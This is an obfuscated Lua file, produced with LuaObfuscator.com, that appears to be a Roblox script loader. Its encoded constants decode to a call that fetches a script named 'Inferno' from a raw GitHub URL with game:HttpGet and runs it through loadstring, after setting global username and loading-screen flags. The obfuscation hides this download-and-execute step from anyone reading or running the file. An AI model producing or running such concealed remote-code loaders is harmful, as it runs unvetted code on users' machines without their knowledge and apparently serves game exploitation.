--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.9.19) ~  Much Love, Ferib 

]]--

local v0 = tonumber;
local v1 = string.byte;
local v2 = string.char;
local v3 = string.sub;
local v4 = string.gsub;
local v5 = string.rep;
local v6 = table.concat;
local v7 = table.insert;
local v8 = math.ldexp;
local v9 = getfenv or function()
	return _ENV;
end;
local v10 = setmetatable;
local v11 = pcall;
local v12 = select;
local v13 = unpack or table.unpack;
local v14 = tonumber;
local function v15(v16, v17, ...)
	local v18 = 1;
	local v19;
	v16 = v4(v3(v16, 5), "..", function(v30)
		if (v1(v30, 2) == 79) then
			v19 = v0(v3(v30, 1, 1));
			return "";
		else
			local v80 = v2(v0(v30, 16));
			if v19 then
				local v86 = v5(v80, v19);
				v19 = nil;
				return v86;
			else
				return v80;
			end
		end
	end);
	local function v20(v31, v32, v33)
		if v33 then
			local v81 = (v31 / (((1 + 4) - 3) ^ (v32 - ((879 - (282 + 595)) - 1)))) % ((3 - 1) ^ (((v33 - (2 - 1)) - (v32 - (1638 - (1523 + 114)))) + (620 - (499 + 56 + 64))));
			return v81 - (v81 % (932 - (857 + 74)));
		else
			local v82 = (570 - (367 + 201)) ^ (v32 - (928 - (214 + 713)));
			return (((v31 % (v82 + v82)) >= v82) and 1) or (0 + 0);
		end
	end
	local function v21()
		local v34 = v1(v16, v18, v18);
		v18 = v18 + 1;
		return v34;
	end
	local function v22()
		local v35, v36 = v1(v16, v18, v18 + (2 - 0));
		v18 = v18 + (1067 - (68 + 997));
		return (v36 * 256) + v35;
	end
	local function v23()
		local v37, v38, v39, v40 = v1(v16, v18, v18 + (1273 - (51 + 175 + 1044)));
		v18 = v18 + (17 - 13);
		return (v40 * (16777333 - (32 + 85))) + (v39 * 65536) + (v38 * (251 + 5)) + v37;
	end
	local function v24()
		local v41 = v23();
		local v42 = v23();
		local v43 = 958 - (892 + 65);
		local v44 = (v20(v42, 2 - 1, 36 - 16) * ((3 - 1) ^ ((678 - 296) - (87 + 0 + 263)))) + v41;
		local v45 = v20(v42, 201 - (67 + 113), 31);
		local v46 = ((v20(v42, 32) == ((792 - (368 + 423)) + 0)) and -(2 - 1)) or (1 + (0 - 0));
		if (v45 == (0 - 0)) then
			if (v44 == ((2081 - 1129) - (802 + 150))) then
				return v46 * 0;
			else
				v45 = 1;
				v43 = 0 - 0;
			end
		elseif (v45 == (3712 - (5232 - 3567))) then
			return ((v44 == (0 + 0)) and (v46 * ((998 - (915 + 15 + 67)) / (0 - 0)))) or (v46 * NaN);
		end
		return v8(v46, v45 - (596 + 427)) * (v43 + (v44 / ((2 - 0) ^ (1239 - (1069 + 118)))));
	end
	local function v25(v47)
		local v48 = 0 - 0;
		local v49;
		local v50;
		while true do
			if (v48 == (442 - (416 + (885 - (814 + 45))))) then
				v49 = nil;
				if not v47 then
					v47 = v23();
					if (v47 == (0 - (0 - 0))) then
						return "";
					end
				end
				v48 = 1;
			end
			if (v48 == (1 + 1 + 1)) then
				return v6(v50);
			end
			if (v48 == (8 - 6)) then
				v50 = {};
				for v87 = 1, #v49 do
					v50[v87] = v2(v1(v3(v49, v87, v87)));
				end
				v48 = 4 - 1;
			end
			if (v48 == ((156 + 283) - (145 + 293))) then
				v49 = v3(v16, v18, (v18 + v47) - (431 - (44 + 386)));
				v18 = v18 + v47;
				v48 = (2373 - (261 + 624)) - ((1773 - 775) + 488);
			end
		end
	end
	local v26 = v23;
	local function v27(...)
		return {...}, v12("#", ...);
	end
	local function v28()
		local v51 = 1504 - (363 + 1141);
		local v52;
		local v53;
		local v54;
		local v55;
		local v56;
		local v57;
		local v58;
		local v59;
		while true do
			if (v51 ~= (1580 - (1183 + 397))) then
			else
				v52 = 0 - 0;
				v53 = nil;
				v51 = 1 + 0;
			end
			if (3 ~= v51) then
			else
				v58 = nil;
				v59 = nil;
				v51 = 1504 - (1408 + 92);
			end
			if (v51 == (1088 - (461 + 625))) then
				v56 = nil;
				v57 = nil;
				v51 = 3;
			end
			if (v51 ~= (1979 - (1913 + 62))) then
			else
				while true do
					if (v52 ~= (1289 - (993 + 295))) then
					else
						local v93 = 0 + 0;
						while true do
							if (v93 ~= (1172 - (418 + 753))) then
							else
								v52 = 1 + 1;
								break;
							end
							if ((0 + 0) ~= v93) then
							else
								v55 = nil;
								v56 = nil;
								v93 = 1;
							end
						end
					end
					if (v52 == (1 + 1)) then
						local v94 = 0 + 0;
						while true do
							if (v94 ~= 1) then
							else
								v52 = 7 - 4;
								break;
							end
							if (v94 ~= 0) then
							else
								v57 = nil;
								v58 = nil;
								v94 = 530 - (406 + 123);
							end
						end
					end
					if (v52 ~= (11 - 8)) then
					else
						v59 = nil;
						while true do
							local v95 = 1769 - (1749 + 20);
							while true do
								if (v95 == 0) then
									if (v53 == (0 + 0)) then
										local v135 = 1322 - (1249 + 73);
										while true do
											if (v135 ~= (1 - 0)) then
											else
												local v163 = 0 + 0;
												while true do
													if (v163 ~= (1145 - (466 + 679))) then
													else
														v56 = {};
														v57 = {v54,v55,nil,v56};
														v163 = 2 - 1;
													end
													if (v163 ~= (1901 - (106 + 1794))) then
													else
														v135 = 1 + 1;
														break;
													end
												end
											end
											if (v135 ~= 2) then
											else
												v53 = 857 - (564 + 292);
												break;
											end
											if (v135 == (0 - 0)) then
												local v164 = 0 + 0;
												while true do
													if (v164 == 1) then
														v135 = 305 - (244 + 60);
														break;
													end
													if (v164 ~= 0) then
													else
														v54 = {};
														v55 = {};
														v164 = 2 - 1;
													end
												end
											end
										end
									end
									if (v53 ~= (5 - 3)) then
									else
										for v142 = 115 - (4 + 110), v23() do
											local v143 = 0;
											local v144;
											local v145;
											while true do
												if (v143 == (585 - (57 + 527))) then
													while true do
														if (v144 ~= (1427 - (41 + 1386))) then
														else
															v145 = v21();
															if (v20(v145, 1, 1) ~= (103 - (17 + 86))) then
															else
																local v172 = 0 + 0;
																local v173;
																local v174;
																local v175;
																local v176;
																local v177;
																while true do
																	if (v172 == (1 + 0)) then
																		v175 = nil;
																		v176 = nil;
																		v172 = 2;
																	end
																	if (v172 ~= (1 + 1)) then
																	else
																		v177 = nil;
																		while true do
																			if (v173 == (1 - 0)) then
																				v176 = nil;
																				v177 = nil;
																				v173 = 2;
																			end
																			if (0 == v173) then
																				local v186 = 0 - 0;
																				while true do
																					if (v186 ~= 1) then
																					else
																						v173 = 1;
																						break;
																					end
																					if (v186 == 0) then
																						v174 = 0;
																						v175 = nil;
																						v186 = 167 - (122 + 44);
																					end
																				end
																			end
																			if (v173 == (1140 - (782 + 356))) then
																				while true do
																					if (v174 ~= (268 - (176 + 91))) then
																					else
																						local v189 = 0 - 0;
																						while true do
																							if (v189 == (0 - 0)) then
																								v177 = {v22(),v22(),nil,nil};
																								if (v175 == (0 - 0)) then
																									local v195 = 0 + 0;
																									local v196;
																									local v197;
																									local v198;
																									while true do
																										if (v195 == (66 - (30 + 35))) then
																											v198 = nil;
																											while true do
																												if (v196 == (3 - 2)) then
																													while true do
																														if (v197 ~= (0 - 0)) then
																														else
																															v198 = 1018 - (697 + 321);
																															while true do
																																if (v198 == (0 - 0)) then
																																	v177[5 - 2] = v22();
																																	v177[3 + 1] = v22();
																																	break;
																																end
																															end
																															break;
																														end
																													end
																													break;
																												end
																												if ((0 + 0) ~= v196) then
																												else
																													local v205 = 1257 - (1043 + 214);
																													while true do
																														if ((0 - 0) ~= v205) then
																														else
																															v197 = 0 - 0;
																															v198 = nil;
																															v205 = 1213 - (323 + 889);
																														end
																														if ((2 - 1) ~= v205) then
																														else
																															v196 = 612 - (602 + 9);
																															break;
																														end
																													end
																												end
																											end
																											break;
																										end
																										if (v195 == (580 - (361 + 219))) then
																											v196 = 1189 - (449 + 740);
																											v197 = nil;
																											v195 = 1;
																										end
																									end
																								elseif (v175 == 1) then
																									v177[3] = v23();
																								elseif (v175 == (322 - (53 + 267))) then
																									v177[3] = v23() - ((1 + 1) ^ 16);
																								elseif (v175 == (416 - (15 + 398))) then
																									local v206 = 982 - (18 + 964);
																									local v207;
																									while true do
																										if (v206 ~= (0 - 0)) then
																										else
																											v207 = 0;
																											while true do
																												if (v207 ~= (0 + 0)) then
																												else
																													v177[2 + 1] = v23() - ((852 - (20 + 830)) ^ (888 - (826 + 46)));
																													v177[4] = v22();
																													break;
																												end
																											end
																											break;
																										end
																									end
																								end
																								v189 = 1 + 0;
																							end
																							if (v189 == (948 - (245 + 702))) then
																								v174 = 128 - (116 + 10);
																								break;
																							end
																						end
																					end
																					if (v174 == (0 + 0)) then
																						local v190 = 0;
																						while true do
																							if (v190 == (738 - (542 + 196))) then
																								v175 = v20(v145, 1 + 1, 6 - 3);
																								v176 = v20(v145, 4, 2 + 4);
																								v190 = 1;
																							end
																							if ((441 - (382 + 58)) ~= v190) then
																							else
																								v174 = 3 - 2;
																								break;
																							end
																						end
																					end
																					if (v174 == (3 + 0)) then
																						if (v20(v176, 3, 2 + 1) == (1 + 0)) then
																							v177[10 - 6] = v59[v177[9 - 5]];
																						end
																						v54[v142] = v177;
																						break;
																					end
																					if (v174 ~= (1553 - (1126 + 425))) then
																					else
																						local v192 = 405 - (118 + 287);
																						while true do
																							if (v192 ~= (1691 - (1121 + 569))) then
																							else
																								v174 = 11 - 8;
																								break;
																							end
																							if (v192 == (1121 - (118 + 1003))) then
																								if (v20(v176, 1, 2 - 1) ~= (378 - (142 + 235))) then
																								else
																									v177[9 - 7] = v59[v177[685 - (483 + 200)]];
																								end
																								if (v20(v176, 2, 1465 - (1404 + 59)) ~= (2 - 1)) then
																								else
																									v177[1 + 2] = v59[v177[3 - 0]];
																								end
																								v192 = 1;
																							end
																						end
																					end
																				end
																				break;
																			end
																		end
																		break;
																	end
																	if (v172 ~= (977 - (553 + 424))) then
																	else
																		v173 = 0 - 0;
																		v174 = nil;
																		v172 = 3 - 2;
																	end
																end
															end
															break;
														end
													end
													break;
												end
												if ((0 + 0) == v143) then
													local v168 = 0;
													local v169;
													while true do
														if (v168 == (0 - 0)) then
															v169 = 0 + 0;
															while true do
																if (v169 == 1) then
																	v143 = 1 - 0;
																	break;
																end
																if (v169 == (0 + 0)) then
																	local v179 = 0 + 0;
																	while true do
																		if ((0 + 0) ~= v179) then
																		else
																			v144 = 0 + 0;
																			v145 = nil;
																			v179 = 2 - 1;
																		end
																		if (v179 ~= (2 - 1)) then
																		else
																			v169 = 1;
																			break;
																		end
																	end
																end
															end
															break;
														end
													end
												end
											end
										end
										for v146 = 2 - 1, v23() do
											v55[v146 - 1] = v28();
										end
										return v57;
									end
									v95 = 2 - 1;
								end
								if (v95 ~= 1) then
								else
									if (v53 ~= (1 + 0)) then
									else
										local v136 = 0 + 0;
										local v137;
										while true do
											if (v136 ~= 0) then
											else
												v137 = 0;
												while true do
													if (v137 ~= (9 - 7)) then
													else
														v53 = 2 + 0;
														break;
													end
													if (v137 ~= (754 - (239 + 514))) then
													else
														local v170 = 0;
														while true do
															if (v170 == (0 - 0)) then
																for v180 = 1, v58 do
																	local v181 = 0;
																	local v182;
																	local v183;
																	local v184;
																	while true do
																		if (0 ~= v181) then
																		else
																			local v185 = 0 + 0;
																			while true do
																				if (v185 == (1329 - (797 + 532))) then
																					v182 = 0 + 0;
																					v183 = nil;
																					v185 = 1 + 0;
																				end
																				if (v185 ~= (1 + 0)) then
																				else
																					v181 = 2 - 1;
																					break;
																				end
																			end
																		end
																		if (v181 ~= (766 - (574 + 191))) then
																		else
																			v184 = nil;
																			while true do
																				if (v182 == 0) then
																					local v187 = 0 + 0;
																					while true do
																						if (v187 == 0) then
																							v183 = v21();
																							v184 = nil;
																							v187 = 1;
																						end
																						if (v187 == 1) then
																							v182 = 1;
																							break;
																						end
																					end
																				end
																				if (v182 == (1203 - (373 + 829))) then
																					if (v183 == (732 - (476 + 255))) then
																						v184 = v21() ~= 0;
																					elseif (v183 == (1132 - (369 + 761))) then
																						v184 = v24();
																					elseif (v183 ~= 3) then
																					else
																						v184 = v25();
																					end
																					v59[v180] = v184;
																					break;
																				end
																			end
																			break;
																		end
																	end
																end
																v57[3] = v21();
																v170 = 1 + 0;
															end
															if (v170 == (1 - 0)) then
																v137 = 2;
																break;
															end
														end
													end
													if (v137 ~= (849 - (254 + 595))) then
													else
														local v171 = 0;
														while true do
															if (v171 ~= (0 - 0)) then
															else
																v58 = v23();
																v59 = {};
																v171 = 239 - (64 + 174);
															end
															if ((1 + 0) ~= v171) then
															else
																v137 = 1 - 0;
																break;
															end
														end
													end
												end
												break;
											end
										end
									end
									break;
								end
							end
						end
						break;
					end
					if ((336 - (144 + 192)) ~= v52) then
					else
						v53 = 216 - (42 + 174);
						v54 = nil;
						v52 = 1 + 0;
					end
				end
				break;
			end
			if (v51 ~= (1 + 0)) then
			else
				v54 = nil;
				v55 = nil;
				v51 = 1 + 1;
			end
		end
	end
	local function v29(v60, v61, v62)
		local v63 = v60[1];
		local v64 = v60[2];
		local v65 = v60[3];
		return function(...)
			local v66 = v63;
			local v67 = v64;
			local v68 = v65;
			local v69 = v27;
			local v70 = 1;
			local v71 = -1;
			local v72 = {};
			local v73 = {...};
			local v74 = v12("#", ...) - 1;
			local v75 = {};
			local v76 = {};
			for v83 = 0, v74 do
				if (v83 >= v68) then
					v72[v83 - v68] = v73[v83 + 1];
				else
					v76[v83] = v73[v83 + 1];
				end
			end
			local v77 = (v74 - v68) + 1;
			local v78;
			local v79;
			while true do
				v78 = v66[v70];
				v79 = v78[1];
				if (v79 <= 5) then
					if (v79 <= 2) then
						if (v79 <= 0) then
							v70 = v78[3];
						elseif (v79 == 1) then
							v76[v78[2]][v78[3]] = v78[4];
						else
							local v106;
							local v107, v108;
							local v109;
							local v110;
							if ((v78[3] == "_ENV") or (v78[3] == "getfenv")) then
								v76[v78[2]] = v62;
							else
								v76[v78[2]] = v62[v78[3]];
							end
							v70 = v70 + 1;
							v78 = v66[v70];
							v110 = v78[2];
							v109 = v76[v78[3]];
							v76[v110 + 1] = v109;
							v76[v110] = v109[v78[4]];
							v70 = v70 + 1;
							v78 = v66[v70];
							v76[v78[2]] = v78[3];
							v70 = v70 + 1;
							v78 = v66[v70];
							v110 = v78[2];
							v107, v108 = v69(v76[v110](v13(v76, v110 + 1, v78[3])));
							v71 = (v108 + v110) - 1;
							v106 = 0;
							for v129 = v110, v71 do
								local v130 = 0;
								while true do
									if (v130 == 0) then
										v106 = v106 + 1;
										v76[v129] = v107[v106];
										break;
									end
								end
							end
							v70 = v70 + 1;
							v78 = v66[v70];
							v110 = v78[2];
							v76[v110] = v76[v110](v13(v76, v110 + 1, v71));
							v70 = v70 + 1;
							v78 = v66[v70];
							v76[v78[2]]();
							v70 = v70 + 1;
							v78 = v66[v70];
							v70 = v78[3];
						end
					elseif (v79 <= 3) then
						local v97 = 0;
						local v98;
						while true do
							if (0 == v97) then
								v98 = v78[2];
								v76[v98] = v76[v98](v13(v76, v98 + 1, v71));
								break;
							end
						end
					elseif (v79 > 4) then
						local v119 = 0;
						while true do
							if (4 == v119) then
								v70 = v78[3];
								break;
							end
							if (v119 == 1) then
								if ((v78[3] == "_ENV") or (v78[3] == "getfenv")) then
									v76[v78[2]] = v62;
								else
									v76[v78[2]] = v62[v78[3]];
								end
								v70 = v70 + 1;
								v78 = v66[v70];
								v119 = 2;
							end
							if (v119 == 3) then
								v76[v78[2]] = v78[3];
								v70 = v70 + 1;
								v78 = v66[v70];
								v119 = 4;
							end
							if (v119 == 0) then
								v76[v78[2]][v78[3]] = v78[4];
								v70 = v70 + 1;
								v78 = v66[v70];
								v119 = 1;
							end
							if (v119 == 2) then
								v76[v78[2]][v78[3]] = v78[4];
								v70 = v70 + 1;
								v78 = v66[v70];
								v119 = 3;
							end
						end
					else
						v76[v78[2]]();
					end
				elseif (v79 <= 8) then
					if (v79 <= 6) then
						if ((v78[3] == "_ENV") or (v78[3] == "getfenv")) then
							v76[v78[2]] = v62;
						else
							v76[v78[2]] = v62[v78[3]];
						end
					elseif (v79 > 7) then
						do
							return;
						end
					else
						v76[v78[2]] = v78[3];
					end
				elseif (v79 <= 9) then
					local v99 = v78[2];
					local v100 = v76[v78[3]];
					v76[v99 + 1] = v100;
					v76[v99] = v100[v78[4]];
				elseif (v79 == 10) then
					local v125 = v78[2];
					local v126, v127 = v69(v76[v125](v13(v76, v125 + 1, v78[3])));
					v71 = (v127 + v125) - 1;
					local v128 = 0;
					for v133 = v125, v71 do
						local v134 = 0;
						while true do
							if (v134 == 0) then
								v128 = v128 + 1;
								v76[v133] = v126[v128];
								break;
							end
						end
					end
				elseif (v76[v78[2]] == v78[4]) then
					v70 = v70 + 1;
				else
					v70 = v78[3];
				end
				v70 = v70 + 1;
			end
		end;
	end
	return v29(v28(), {}, v17)(...);
end
v15("LOL!0B3O00028O00026O00F03F030A3O006C6F6164737472696E6703043O0067616D6503073O00482O7470476574033B3O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F446869726B30372F6E692O7A2F6D61696E2F496E6665726E6F03023O005F4703083O00557365726E616D65030B3O00726F646576736372697074030D3O004C6F6164696E675363722O656E2O0100143O0012073O00013O00260B3O000B0001000200044O000B0001001206000100033O001202000200043O00202O00020002000500122O000400066O000200046O00013O00024O00010001000100044O0013000100260B3O00010001000100044O00010001001206000100073O00300500010008000900122O000100073O00302O0001000A000B00124O00023O00044O000100012O00083O00017O00", v9(), ...);
